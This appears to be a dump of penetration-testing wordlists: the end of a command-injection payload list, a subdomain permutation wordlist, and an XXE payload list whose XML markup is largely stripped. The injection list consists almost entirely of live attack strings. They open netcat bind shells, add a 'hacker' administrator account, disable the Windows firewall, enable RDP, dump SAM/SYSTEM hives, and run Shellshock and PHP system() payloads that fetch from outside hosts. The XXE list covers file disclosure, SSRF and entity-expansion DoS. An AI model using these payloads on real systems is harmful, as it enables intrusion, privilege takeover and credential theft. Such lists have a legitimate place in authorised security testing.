;{$_GET["cmd"]} 102 | `id` 103 | |id 104 | | id 105 | ;id 106 | ;id| 107 | ;id; 108 | & id 109 | &&id 110 | ;id\n 111 | ifconfig 112 | | ifconfig 113 | ; ifconfig 114 | & ifconfig 115 | && ifconfig 116 | /index.html|id| 117 | ipconfig 118 | | ipconfig /all 119 | ; ipconfig /all 120 | & ipconfig /all 121 | && ipconfig /all 122 | ipconfig /all 123 | ls 124 | $(`ls`) 125 | | ls -l / 126 | ; ls -l / 127 | & ls -l / 128 | && ls -l / 129 | ls -l / 130 | | ls -laR /etc 131 | ; ls -laR /etc 132 | & ls -laR /etc 133 | && ls -laR /etc 134 | | ls -laR /var/www 135 | ; ls -laR /var/www 136 | & ls -laR /var/www 137 | && ls -laR /var/www 138 | | ls -l /etc/ 139 | ; ls -l /etc/ 140 | & ls -l /etc/ 141 | && ls -l /etc/ 142 | ls -l /etc/ 143 | ls -lh /etc/ 144 | | ls -l /home/* 145 | ; ls -l /home/* 146 | & ls -l /home/* 147 | && ls -l /home/* 148 | ls -l /home/* 149 | *; ls -lhtR /var/www/ 150 | | ls -l /tmp 151 | ; ls -l /tmp 152 | & ls -l /tmp 153 | && ls -l /tmp 154 | ls -l /tmp 155 | | ls -l /var/www/* 156 | ; ls -l /var/www/* 157 | & ls -l /var/www/* 158 | && ls -l /var/www/* 159 | ls -l /var/www/* 160 | \n 161 | \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` 162 | \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` 163 | \n/bin/ls -al\n 164 | | nc -lvvp 4444 -e /bin/sh| 165 | ; nc -lvvp 4444 -e /bin/sh; 166 | & nc -lvvp 4444 -e /bin/sh& 167 | && nc -lvvp 4444 -e /bin/sh & 168 | nc -lvvp 4444 -e /bin/sh 169 | nc -lvvp 4445 -e /bin/sh & 170 | nc -lvvp 4446 -e /bin/sh| 171 | nc -lvvp 4447 -e /bin/sh; 172 | nc -lvvp 4448 -e /bin/sh& 173 | \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n 174 | \necho INJECTX\nexit\n\033[2Asleep 5\n 175 | \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n 176 | | net localgroup Administrators hacker /ADD 177 | ; net localgroup Administrators hacker /ADD 178 | & net localgroup Administrators hacker /ADD 179 | && net localgroup Administrators hacker /ADD 180 | net localgroup Administrators hacker /ADD 181 | | netsh firewall set opmode disable 182 | ; netsh firewall set opmode disable 183 | & netsh firewall set opmode disable 184 | && netsh firewall set opmode disable 185 | netsh firewall set opmode disable 186 | netstat 187 | ;netstat -a; 188 | | netstat -an 189 | ; netstat -an 190 | & netstat -an 191 | && netstat -an 192 | netstat -an 193 | | net user hacker Password1 /ADD 194 | ; net user hacker Password1 /ADD 195 | & net user hacker Password1 /ADD 196 | && net user hacker Password1 /ADD 197 | net user hacker Password1 /ADD 198 | | net view 199 | ; net view 200 | & net view 201 | && net view 202 | net view 203 | \nid| 204 | \nid; 205 | \nid\n 206 | \n/usr/bin/id\n 207 | perl -e 'print "X"x1024' 208 | || perl -e 'print "X"x16096' 209 | | perl -e 'print "X"x16096' 210 | ; perl -e 'print "X"x16096' 211 | & perl -e 'print "X"x16096' 212 | && perl -e 'print "X"x16096' 213 | perl -e 'print "X"x16384' 214 | ; perl -e 'print "X"x2048' 215 | & perl -e 'print "X"x2048' 216 | && perl -e 'print "X"x2048' 217 | perl -e 'print "X"x2048' 218 | || perl -e 'print "X"x4096' 219 | | perl -e 'print "X"x4096' 220 | ; perl -e 'print "X"x4096' 221 | & perl -e 'print "X"x4096' 222 | && perl -e 'print "X"x4096' 223 | perl -e 'print "X"x4096' 224 | || perl -e 'print "X"x8096' 225 | | perl -e 'print "X"x8096' 226 | ; perl -e 'print "X"x8096' 227 | && perl -e 'print "X"x8096' 228 | perl -e 'print "X"x8192' 229 | perl -e 'print "X"x81920' 230 | || phpinfo() 231 | | phpinfo() 232 | {${phpinfo()}} 233 | ;phpinfo() 234 | ;phpinfo();// 235 | ';phpinfo();// 236 | {${phpinfo()}} 237 | & phpinfo() 238 | && phpinfo() 239 | phpinfo() 240 | phpinfo(); 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | :phpversion(); 249 | `ping 127.0.0.1` 250 | & ping -i 30 127.0.0.1 & 251 | & ping -n 30 127.0.0.1 & 252 | ;${@print(md5(RCEVulnerable))}; 253 | ${@print("RCEVulnerable")} 254 | ${@print(system($_SERVER['HTTP_USER_AGENT']))} 255 | pwd 256 | | pwd 257 | ; pwd 258 | & pwd 259 | && pwd 260 | \r 261 | | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 262 | ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 263 | & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 264 | && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 265 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 266 | \r\n 267 | route 268 | | sleep 1 269 | ; sleep 1 270 | & sleep 1 271 | && sleep 1 272 | sleep 1 273 | || sleep 10 274 | | sleep 10 275 | ; sleep 10 276 | {${sleep(10)}} 277 | & sleep 10 278 | && sleep 10 279 | sleep 10 280 | || sleep 15 281 | | sleep 15 282 | ; sleep 15 283 | & sleep 15 284 | && sleep 15 285 | {${sleep(20)}} 286 | {${sleep(20)}} 287 | {${sleep(3)}} 288 | {${sleep(3)}} 289 | | sleep 5 290 | ; sleep 5 291 | & sleep 5 292 | && sleep 5 293 | sleep 5 294 | {${sleep(hexdec(dechex(20)))}} 295 | {${sleep(hexdec(dechex(20)))}} 296 | sysinfo 297 | | sysinfo 298 | ; sysinfo 299 | & sysinfo 300 | && sysinfo 301 | system('cat C:\boot.ini'); 302 | system('cat config.php'); 303 | || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 304 | | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 305 | ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 306 | & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 307 | && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 308 | system('curl https://crowdshield.com/.testing/rce_vuln.txt') 309 | system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') 310 | system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); 311 | system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 312 | systeminfo 313 | | systeminfo 314 | ; systeminfo 315 | & systeminfo 316 | && systeminfo 317 | system('ls') 318 | system('pwd') 319 | system('pwd'); 320 | || system('sleep 5'); 321 | | system('sleep 5'); 322 | ; system('sleep 5'); 323 | & system('sleep 5'); 324 | && system('sleep 5'); 325 | system('sleep 5') 326 | system('sleep 5'); 327 | system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') 328 | system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); 329 | system('whoami') 330 | system('whoami'); 331 | test*; ls -lhtR /var/www/ 332 | test* || perl -e 'print "X"x16096' 333 | test* | perl -e 'print "X"x16096' 334 | test* & perl -e 'print "X"x16096' 335 | test* && perl -e 'print "X"x16096' 336 | test*; perl -e 'print "X"x16096' 337 | $(`type C:\boot.ini`) 338 | &&type C:\\boot.ini 339 | | type C:\Windows\repair\SAM 340 | ; type C:\Windows\repair\SAM 341 | & type C:\Windows\repair\SAM 342 | && type C:\Windows\repair\SAM 343 | type C:\Windows\repair\SAM 344 | | type C:\Windows\repair\SYSTEM 345 | ; type C:\Windows\repair\SYSTEM 346 | & type C:\Windows\repair\SYSTEM 347 | && type C:\Windows\repair\SYSTEM 348 | type C:\Windows\repair\SYSTEM 349 | | type C:\WINNT\repair\SAM 350 | ; type C:\WINNT\repair\SAM 351 | & type C:\WINNT\repair\SAM 352 | && type C:\WINNT\repair\SAM 353 | type C:\WINNT\repair\SAM 354 | type C:\WINNT\repair\SYSTEM 355 | | type %SYSTEMROOT%\repair\SAM 356 | ; type %SYSTEMROOT%\repair\SAM 357 | & type %SYSTEMROOT%\repair\SAM 358 | && type %SYSTEMROOT%\repair\SAM 359 | type %SYSTEMROOT%\repair\SAM 360 | | type %SYSTEMROOT%\repair\SYSTEM 361 | ; type %SYSTEMROOT%\repair\SYSTEM 362 | & type %SYSTEMROOT%\repair\SYSTEM 363 | && type %SYSTEMROOT%\repair\SYSTEM 364 | type %SYSTEMROOT%\repair\SYSTEM 365 | uname 366 | ;uname; 367 | | uname -a 368 | ; uname -a 369 | & uname -a 370 | && uname -a 371 | uname -a 372 | |/usr/bin/id 373 | ;|/usr/bin/id| 374 | ;/usr/bin/id| 375 | $;/usr/bin/id 376 | () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' 377 | () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 378 | | wget http://crowdshield.com/.testing/rce.txt 379 | & wget http://crowdshield.com/.testing/rce.txt 380 | ; wget https://crowdshield.com/.testing/rce_vuln.txt 381 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) 382 | && wget https://crowdshield.com/.testing/rce_vuln.txt 383 | wget https://crowdshield.com/.testing/rce_vuln.txt 384 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) 385 | which curl 386 | which gcc 387 | which nc 388 | which netcat 389 | which perl 390 | which python 391 | which wget 392 | whoami 393 | | whoami 394 | ; whoami 395 | ' whoami 396 | ' || whoami 397 | ' & whoami 398 | ' && whoami 399 | '; whoami 400 | " whoami 401 | " || whoami 402 | " | whoami 403 | " & whoami 404 | " && whoami 405 | "; whoami 406 | $(`whoami`) 407 | & whoami 408 | && whoami 409 | {{ get_user_file("C:\boot.ini") }} 410 | {{ get_user_file("/etc/hosts") }} 411 | {{4+4}} 412 | {{4+8}} 413 | {{person.secret}} 414 | {{person.name}} 415 | {1} + {1} 416 | {% For c in [1,2,3]%} {{c, c, c}} {% endfor%} 417 | {{[] .__ Class __.__ base __.__ subclasses __ ()}} 418 | -------------------------------------------------------------------------------- /wordlists/words_permutation.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 10 3 | 11 4 | 12 5 | 13 6 | 14 7 | 15 8 | 16 9 | 17 10 | 18 11 | 19 12 | 2 13 | 20 14 | 2009 15 | 2010 16 | 2011 17 | 2012 18 | 2013 19 | 2014 20 | 2015 21 | 2016 22 | 2017 23 | 2018 24 | 2019 25 | 3 26 | 4 27 | 5 28 | 6 29 | 7 30 | 8 31 | 9 32 | a 33 | acc 34 | accept 35 | account 36 | accounting 37 | accounts 38 | active 39 | adm 40 | admin 41 | admin1 42 | administrator 43 | administrators 44 | admins 45 | akali 46 | akamai 47 | alpha 48 | alt 49 | america 50 | analytics 51 | apac 52 | apache 53 | api 54 | api-docs 55 | api1 56 | apidocs 57 | apiserver 58 | apollo 59 | app 60 | application 61 | applications 62 | apps 63 | april 64 | asana 65 | assets 66 | auth 67 | authenticate 68 | authentication 69 | authorization 70 | aws 71 | azure 72 | b 73 | backend 74 | beta 75 | billing 76 | bitbucket 77 | boards 78 | box 79 | brand 80 | brasil 81 | brazil 82 | bucket 83 | bucky 84 | c 85 | cdn 86 | cert 87 | cf 88 | cgi 89 | chd 90 | chef 91 | ci 92 | client 93 | cloud 94 | cloudapp 95 | cloudfront 96 | cms 97 | cms1 98 | cn 99 | com 100 | confluence 101 | container 102 | control 103 | controller 104 | ctl 105 | customer 106 | cvs 107 | dashboard 108 | data 109 | dec 110 | demo 111 | dev 112 | dev1 113 | develop 114 | developer 115 | development 116 | devops 117 | devs 118 | disabled 119 | docker 120 | docs 121 | docsapi 122 | document 123 | documentation 124 | documents 125 | drop 126 | ebs 127 | edge 128 | elastic 129 | elasticbeanstalk 130 | elb 131 | email 132 | emea 133 | eng 134 | engima 135 | engine 136 | engineering 137 | eu 138 | europe 139 | europewest 140 | euw 141 | euwe 142 | evelynn 143 | events 144 | ext 145 | feb 146 | fet 147 | file 148 | firewall 149 | forms 150 | forum 151 | frontpage 152 | fw 153 | games 154 | gateway 155 | germany 156 | get 157 | getter 158 | gh 159 | ghcpi 160 | gist 161 | git 162 | github 163 | gitlab 164 | global 165 | gw 166 | help 167 | history 168 | hkg 169 | hw 170 | hwcdn 171 | i 172 | iad 173 | ids 174 | ingress 175 | int 176 | internal 177 | internals 178 | jenkins 179 | jinx 180 | july 181 | june 182 | k8s 183 | k8s-dev 184 | k8s-prd 185 | k8s-prod 186 | kor 187 | korea 188 | kr 189 | kube 190 | kubectl 191 | kubernetes 192 | lab 193 | lan 194 | las 195 | latin 196 | latinamerica 197 | lax 198 | lax1 199 | lb 200 | legacy 201 | loadbalancer 202 | login 203 | machine 204 | mail 205 | manage 206 | management 207 | march 208 | market 209 | marketing 210 | merch 211 | merchant 212 | metric 213 | metrics 214 | mgmt 215 | mirror 216 | mobile 217 | mobileclient 218 | na 219 | nautilus 220 | net 221 | netherlands 222 | nginx 223 | nl 224 | node 225 | northamerica 226 | nov 227 | oceania 228 | oct 229 | oid 230 | old 231 | ops 232 | org 233 | origin 234 | page 235 | panel 236 | pantheon 237 | partner 238 | pass 239 | pay 240 | payment 241 | paywall 242 | pc 243 | php 244 | pl 245 | poland 246 | portal 247 | prd 248 | preferences 249 | preview 250 | priv 251 | private 252 | prod 253 | production 254 | productions 255 | profile 256 | profiles 257 | promo 258 | promotion 259 | proxy 260 | raw 261 | redir 262 | redirect 263 | redirector 264 | region 265 | repo 266 | repository 267 | reset 268 | restrict 269 | restricted 270 | reviews 271 | rpc 272 | s 273 | s3 274 | sandbox 275 | scm 276 | search 277 | secure 278 | security 279 | sept 280 | server 281 | service 282 | signed 283 | singed 284 | skins 285 | spring 286 | ssl 287 | staff 288 | stage 289 | stage1 290 | staging 291 | static 292 | stats 293 | stg 294 | support 295 | svc 296 | swag 297 | swagger 298 | system 299 | t 300 | team 301 | test 302 | test1 303 | testbed 304 | tester 305 | testing 306 | testing1 307 | tomcat 308 | toolbar 309 | tpe 310 | tr 311 | traffic 312 | train 313 | training 314 | trial 315 | tur 316 | turk 317 | turkey 318 | twitch 319 | uat 320 | upload 321 | uploads 322 | v1 323 | v2 324 | v3 325 | vi 326 | vpn 327 | w3 328 | web 329 | web1 330 | webapp 331 | westeurope 332 | z 333 | -------------------------------------------------------------------------------- /wordlists/xxe-payload-list.txt: -------------------------------------------------------------------------------- 1 | # XML External Entity (XXE) Injection Payloads 2 | 3 | * XXE : Classic XXE 4 | 5 | 6 | 8 | 9 | ]> 10 | &file; 11 | 12 | 13 | 15 | ]>&xxe; 16 | 17 | 18 | 20 | ]>&xxe; 21 | 22 | 23 | 25 | ]>&xxe; 26 | 27 | * XXE: Basic XML Example 28 | 29 | 30 | 31 | John 32 | Doe 33 | 34 | 35 | * XXE: Entity Example 36 | 37 | 38 | ]> 39 | 40 | John 41 | &example; 42 | 43 | 44 | * XXE: File Disclosure 45 | 46 | 47 | ]> 48 | 49 | John 50 | &ent; 51 | 52 | 53 | * XXE: Denial-of-Service Example 54 | 55 | 56 | 57 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | &lol9; 67 | 68 | * XXE: Local File Inclusion Example 69 | 70 | 71 | 73 | ]>&xxe; 74 | 75 | * XXE: Blind Local File Inclusion Example (When first case doesn't return anything.) 76 | 77 | 78 | 80 | 81 | ]>&blind; 82 | 83 | * XXE: Access Control Bypass (Loading Restricted Resources - PHP example) 84 | 85 | 86 | ]> 88 | 89 | 90 | * XXE:SSRF ( Server Side Request Forgery ) Example 91 | 92 | 93 | 95 | ]>&xxe; 96 | 97 | * XXE: (Remote Attack - Through External Xml Inclusion) Exmaple 98 | 99 | 100 | ]> 102 | 3..2..1...&test 103 | 104 | * XXE: UTF-7 Exmaple 105 | 106 | 107 | +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 108 | +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ 109 | +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 110 | 111 | * XXE: Base64 Encoded 112 | 113 | %init; ]> 114 | 115 | * XXE: XXE inside SOAP Example 116 | 117 | 118 | 119 | %dtd;]>]]> 120 | 121 | 122 | 123 | * XXE: XXE inside SVG 124 | 125 | 126 | 127 | --------------------------------------------------------------------------------